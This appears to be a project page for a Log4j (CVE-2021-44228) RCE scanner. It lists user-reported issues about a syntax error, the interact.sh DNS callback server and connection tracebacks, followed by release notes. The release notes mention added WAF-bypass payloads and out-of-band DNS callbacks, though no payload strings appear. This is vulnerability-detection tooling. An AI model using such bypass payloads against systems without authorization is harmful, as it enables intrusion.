    When you run command: python3 log4j-scan.py -h

    you get the error message:

      File "log4j-scan.py", line 132
        fuzzing_headers["Referer"] = f'https://{fuzzing_headers["Referer"]}'

    opened by YanDatsiuk 4
  • Addressed issue

    Addressed issue "interact.sh server unavailable #131"

    Added '--disable-tls-to-register-dns' arg to fix communication issue with interact.sh. Also added a validation when pulling the logs in case data_list is None.

    opened by hackercat3211 0
  • interact.sh server unavailable

    HTTPSConnectionPool(host='interact.sh', port=443): Max retries exceeded with url: /register (Caused by NewConnectionError('<urllib3.connection.HTTPSConnection object at 0x7f284db3a350>: Failed to establish a new connection: [Errno 111] Connection refused'))

    opened by ademighty24 8
  • Fix issue on interact.sh `pull_logs` function ('NoneType' object is not iterable)

    Add a null check before iterating in pull_logs to avoid this error:

    [•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.
    [•] Waiting...
        main()
      File "/app/log4j-scan.py", line 401, in main
        records = dns_callback.pull_logs()
      File "/app/log4j-scan.py", line 257, in pull_logs
        for i in data_list:
    TypeError: 'NoneType' object is not iterable
    
    opened by pierre42100 0
  • Syntax error in code. Please advise

        if "Referer" in fuzzing_headers:
            fuzzing_headers["Referer"] = f'https://{fuzzing_headers["Referer"]}'
        return fuzzing_headers

    This section of code produces a syntax error, which is annoying. Can you please help me fix this?

    Peter

    opened by Morpheyous 1
  • requests.exceptions.ConnectionError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))

    python3 log4j-scan.py -u https://vcenter7.******.***.**/ui/login #Local server

    [•] CVE-2021-44228 - Apache Log4j RCE Scanner
    [•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
    [•] Secure your External Attack Surface with FullHunt.io.
    [•] Initiating DNS callback server (interact.sh).
    Traceback (most recent call last):
      File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 665, in urlopen
        httplib_response = self._make_request(
      File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 376, in _make_request
        self._validate_conn(conn)
      File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 996, in _validate_conn
        conn.connect()
      File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 366, in connect
        self.sock = ssl_wrap_socket(
      File "/usr/lib/python3/dist-packages/urllib3/util/ssl_.py", line 370, in ssl_wrap_socket
        return context.wrap_socket(sock, server_hostname=server_hostname)
      File "/usr/lib/python3.8/ssl.py", line 500, in wrap_socket
        return self.sslsocket_class._create(
      File "/usr/lib/python3.8/ssl.py", line 1040, in _create
        self.do_handshake()
      File "/usr/lib/python3.8/ssl.py", line 1309, in do_handshake
        self._sslobj.do_handshake()
    ConnectionResetError: [Errno 104] Connection reset by peer

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last):
      File "/usr/local/lib/python3.8/dist-packages/requests/adapters.py", line 439, in send
        resp = conn.urlopen(
      File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 719, in urlopen
        retries = retries.increment(
      File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 400, in increment
        raise six.reraise(type(error), error, _stacktrace)
      File "/usr/lib/python3/dist-packages/six.py", line 702, in reraise
        raise value.with_traceback(tb)
      File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 665, in urlopen
        httplib_response = self._make_request(
      File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 376, in _make_request
        self._validate_conn(conn)
      File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 996, in _validate_conn
        conn.connect()
      File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 366, in connect
        self.sock = ssl_wrap_socket(
      File "/usr/lib/python3/dist-packages/urllib3/util/ssl_.py", line 370, in ssl_wrap_socket
        return context.wrap_socket(sock, server_hostname=server_hostname)
      File "/usr/lib/python3.8/ssl.py", line 500, in wrap_socket
        return self.sslsocket_class._create(
      File "/usr/lib/python3.8/ssl.py", line 1040, in _create
        self.do_handshake()
      File "/usr/lib/python3.8/ssl.py", line 1309, in do_handshake
        self._sslobj.do_handshake()
    urllib3.exceptions.ProtocolError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last):
      File "log4j-scan.py", line 412, in <module>
        main()
      File "log4j-scan.py", line 382, in main
        dns_callback = Interactsh()
      File "log4j-scan.py", line 239, in __init__
        self.register()
      File "log4j-scan.py", line 247, in register
        res = self.session.post(
      File "/usr/local/lib/python3.8/dist-packages/requests/sessions.py", line 578, in post
        return self.request('POST', url, data=data, json=json, **kwargs)
      File "/usr/local/lib/python3.8/dist-packages/requests/sessions.py", line 530, in request
        resp = self.send(prep, **send_kwargs)
      File "/usr/local/lib/python3.8/dist-packages/requests/sessions.py", line 643, in send
        r = adapter.send(request, **kwargs)
      File "/usr/local/lib/python3.8/dist-packages/requests/adapters.py", line 498, in send
        raise ConnectionError(err, request=request)
    requests.exceptions.ConnectionError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))

    opened by GiuBravo 1
Releases (v.1.1.0)
  • v.1.1.0 (Oct 20, 2022)

  • v1.0.1 (Dec 25, 2021)

    • Added additional 15 community-provided WAF bypass payloads (Total payloads: 23 payloads).
    • Added additional common default POST parameters.
    • Added --custom-waf-bypass-payload to add user-defined custom WAF bypass payload.
    • Fixed a minor exception when "Referer" is not set on the headers-file list.
    • Typo and PEP8 related clean-ups.
  • v1.0.0 (Dec 25, 2021)

Owner
FullHunt
Expose Your Attack Surface